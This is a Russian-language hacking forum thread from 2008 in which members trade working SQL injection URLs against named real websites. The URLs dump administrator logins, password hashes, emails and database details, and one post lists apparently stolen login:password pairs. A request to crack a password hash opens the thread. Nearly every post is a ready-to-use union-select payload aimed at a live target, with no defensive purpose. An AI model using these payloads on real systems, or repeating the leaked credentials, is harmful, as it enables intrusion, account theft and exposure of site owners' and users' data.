SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. z1k

    z1k New Member

    Joined:
    11 May 2008
    Messages:
    12
    Likes Received:
    3
    Reputations:
    0
    ребята кто поможет с хешем $1$AOOiO7Zi$2he3AqhhFU8197ojSz9bn/
    очень срочно нада базы непринимают пишут что некоректный но он таков и нада както его росшифравать сменя +++
     
  2. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    эта тема для скулей. тебе сюда http://forum.antichat.ru/showthread.php?p=585987 пост #2464.
     
  3. SUBJECT617

    SUBJECT617 Elder - Старейшина

    Joined:
    6 Aug 2007
    Messages:
    73
    Likes Received:
    34
    Reputations:
    -2
    Code:
    http://www.donny.co.uk/rovers/news.php?ID=-57+union+select+1,admin_id,3,4,5,6,admin_email,admin_pass,9,10,11+from+zenadmin/*
    В information_schema.tables подглядел еще таблицы:
    forums2_acl_users
    phplist_rssitem_user
    phplist_user_user
    ttrss_users
    Чтоб просмотреть их колонки надо будет зашифровать в hex.(Спасибо тохе :) )

    Code:
    http://www.parkui.ru/news.php?id=-57+union+select+1,2,3,4,5,username,7,user_password,user_email,10+from+phpbb_users+limit+1,1/*
     
    #5623 SUBJECT617, 10 Jun 2008
    Last edited: 10 Jun 2008
    2 people like this.
  4. NFM

    NFM Reservists Of Antichat

    Joined:
    16 Jan 2006
    Messages:
    308
    Likes Received:
    191
    Reputations:
    22
    Hacked by [WSWW] teAm
    cупер хекеры мля =\ умно смотреть ачат а потом дефить
     
    2 people like this.
  5. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    NFM, SUBJECT617,
    вот верная таблица форума:
     
    #5625 sabe, 10 Jun 2008
    Last edited: 10 Jun 2008
  6. theli

    theli New Member

    Joined:
    29 May 2008
    Messages:
    12
    Likes Received:
    1
    Reputations:
    0
    MySQL 4.0.27 :(
    но таблицу подобрал только одну да и то вряд ли полезную (да и колонки впадло подбирать)
    знать бы еще куда она смотрит
    там же есть IPB, но его таблицы тоже не нашел
     
  7. Maxyks

    Maxyks Banned

    Joined:
    8 Sep 2007
    Messages:
    174
    Likes Received:
    288
    Reputations:
    20
    там несложно догадаться
    email+name
    ://untp.kiev.ua/test.php?id=1%20union%20 select%201,2,concat_ws(0x3a,email,name),4,5,6+from+untp.ibf_members
    hash+salt
    ://untp.kiev.ua/test.php?id=1%20 union%20select%201,2,concat_ws(0x3a,converge_pass_hash,converge_pass_salt),4,5,6+from+untp.ibf_members_converge​
     
  8. $p01nt

    $p01nt Elder - Старейшина

    Joined:
    19 Feb 2008
    Messages:
    116
    Likes Received:
    20
    Reputations:
    1
    в антибояне нет

    www.pchelenok.ru

    Уязвимость в скрипте который отображает товары:

    Code:
    http://www.pchelenok.ru/index.php?action=show_item&parent=1'
    Просмотр информации:

    Code:
    http://www.pchelenok.ru/index.php?action=show_item&parent=-00032308+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5/*
    Информация о базе:
    Code:
    4.1.22
    [email protected]
    pchelenok_db
    
     
  9. SUBJECT617

    SUBJECT617 Elder - Старейшина

    Joined:
    6 Aug 2007
    Messages:
    73
    Likes Received:
    34
    Reputations:
    -2
    Я канешн понимаю что недохек, но таблицы хоть немного похожей на таблицу юзверей я не нашел, да БД мне заявила что таблицы parol не существует, хотя как видно из урла ниже она там есть.
    Code:
    http://www.mitsubishi-autoluks.com.ua/news.php?id=-85+union+select+1,2,3,4,table_name,6+from+information_schema.tables/*

    А вот и колонки таблицы парол
    Code:
    http://www.mitsubishi-autoluks.com.ua/news.php?id=-85+union+select+1,2,3,4,column_name,6+from+information_schema.columns+where+table_name=0x7061726f6c/*

    Мож вы разберетесь... :confused:
     
  10. А®ТеS

    А®ТеS Active Member

    Joined:
    25 Nov 2006
    Messages:
    198
    Likes Received:
    193
    Reputations:
    41
    Ув. тов. SUBJECT617, все очень просто: БД, с которой работает скрипт называется "mitsubis_auto", а таблица parol в БД "test". Правильный запрос будет:
    Code:
    http://www.mitsubishi-autoluks.com.ua/news.php?id=-85+union+select+1,2,3,4,unhex(hex(passvord)),6+from+test.parol/*
    
    Вы не учитываете поле таблицы INFORMATION_SCHEMA.TABLES table_schema.
     
    2 people like this.
  11. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    нету таблицы parol изза того что не из той базы просиш.
     
  12. SUBJECT617

    SUBJECT617 Elder - Старейшина

    Joined:
    6 Aug 2007
    Messages:
    73
    Likes Received:
    34
    Reputations:
    -2
    Колонки mos_users
    Code:
    http://www.seacoastrugby.org/news.php?id=-174+union+select+1,2,column_name,4+from+information_schema.columns+where+table_name=0x6d6f735f7573657273/*
    Ну и собсно сам mos_users
    Code:
    http://www.seacoastrugby.org/news.php?id=-174+union+select+1,2,username,password+from+mos_users/*
    ===================================================================================================

    Code:
    http://www.umic.co.uk/about_umic/news.php?id=-123+union+select+1,user,password,4,5,6,7,8,9,10+from+mysql.user/*
    Code:
    http://www.umic.co.uk/about_umic/news.php?id=-123+union+select+1,name,password,4,5,6,7,8,9,10+from+nanoeprint.admin_user/*
     
    #5632 SUBJECT617, 11 Jun 2008
    Last edited: 11 Jun 2008
    1 person likes this.
  13. MaSTeR GэN

    MaSTeR GэN Member

    Joined:
    23 May 2008
    Messages:
    102
    Likes Received:
    54
    Reputations:
    7
    http://favoriteagent.com/lcm/b/?p=30&agent=-94226 union select 1,2,version(),4/*
    Db:5.0.22
    user:Mljones@localhost
    DB:F_agent
    Т.к mysql 5 кому нужно таблицы можно FROM INFORMATION_SCHEMA.TABLES выташить ;)
     
    1 person likes this.
  14. SUBJECT617

    SUBJECT617 Elder - Старейшина

    Joined:
    6 Aug 2007
    Messages:
    73
    Likes Received:
    34
    Reputations:
    -2
    Code:
    http://www.spektr-ksk.ru/news.php?id=73'+union+select+1,2,3,id,5+from+user/*
    Code:
    http://www.spektr-ksk.ru/news.php?id=73'+union+select+1,2,3,sername,5+from+user/*
    Как я понял столбец id и есть пасс, просто другого похожего нет =\ Гляньте сами если хотите:
    Code:
    http://www.spektr-ksk.ru/news.php?id=73'+union+select+1,2,3,column_name,5+from+information_schema.columns+where+table_name='user'/*
     
    #5634 SUBJECT617, 11 Jun 2008
    Last edited: 11 Jun 2008
    1 person likes this.
  15. Imperou$

    Imperou$ Elder - Старейшина

    Joined:
    23 May 2008
    Messages:
    90
    Likes Received:
    42
    Reputations:
    0
    Итак приступим, edu, жЫрненькие? по мере возрастания PR :) :

    PR-5

    Никаких дамперов и лимитов ручками. Не забываем, что мы сидим под thelea2_tla, соответственно вывести значения таблиц и колумнофф можно только из этой table_schema.Версия пятая, все таблицы на страницу.
    _________________________________________
    PR-7

    В дополнение к первой. Всё выводится сразу, но сидим под faculty, и нифига там интересного нет :(
    _________________________________________
    PR-7

    _________________________________________
    PR-8

    _________________________________________
    Ещё накрутил с картоном, но здесь тематика вроде неразрешена, выкладывать не буду, и так найдёте :)
     
    6 people like this.
  16. SUBJECT617

    SUBJECT617 Elder - Старейшина

    Joined:
    6 Aug 2007
    Messages:
    73
    Likes Received:
    34
    Reputations:
    -2
    Добро пожаловать в корпорацию Биосфера!
    http://www.biosfera.biz/admin/login.php

    Code:
    http://www.biosfera.biz/news.php?id=0+union+select+1,2,login,4,passwd,6+from+account+limit+0,1/*
    Новость 'login' и ниже пасс непонятно в каком виде. Админка выше. Кто админ хз, всего 4 чела зарегины. Если кому надо будет сам разберется. ;)
     
  17. BlackSun

    BlackSun Banned

    Joined:
    1 Apr 2007
    Messages:
    989
    Likes Received:
    1,168
    Reputations:
    446
    http://www.laemmle.com/viewmovie.php?mid=-1/**/union/**/select/**/1,2,3,4,5,6,7,8,9,database(),user(),12,13,14,15,16,version(),18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42/*
     
  18. Imperou$

    Imperou$ Elder - Старейшина

    Joined:
    23 May 2008
    Messages:
    90
    Likes Received:
    42
    Reputations:
    0
    Ещё еда, PR-6.

    Code:
    http://french.berkeley.edu/news/news_events_ind.php?id=-53+union+select+1,2,concat_ws(0x3A3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/*
    
    4.1.20-log::davidpet@localhost::french_dept_db
    
     
  19. ~!DoK_tOR!~

    ~!DoK_tOR!~ Banned

    Joined:
    10 Nov 2006
    Messages:
    673
    Likes Received:
    357
    Reputations:
    44
    Знакомства на Prostitytki.ru - секс досуг интим услуги эротические рассказы порно истории досуг и интим с девушками.

    denis:tutkin
    kostya:kostya


    Onal.ru - эротика и фотографии а также Интим-услуги, девушек Москвы для состоятельных мужчин

    kostya:kostya
    denis:tutkin

    acburen:n0exsup611:[email protected]


    Знакомства - mobipage.ru

    p.kiev.ua - Разработка сайтов, создание сайтов, web дизайн, раскрутка сайтов -> Дизайн-студия "Полюс-Альфа"

    okna:12345:www.perfect-okna.ru

    www.setguul.mn

     
    #5639 ~!DoK_tOR!~, 11 Jun 2008
    Last edited: 12 Jun 2008
    1 person likes this.
  20. SUBJECT617

    SUBJECT617 Elder - Старейшина

    Joined:
    6 Aug 2007
    Messages:
    73
    Likes Received:
    34
    Reputations:
    -2
    www.bmoca.org
    _http://www.bmoca.org/artist.php?id=-74+union+select+1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+users/*
     
Thread Status:
Not open for further replies.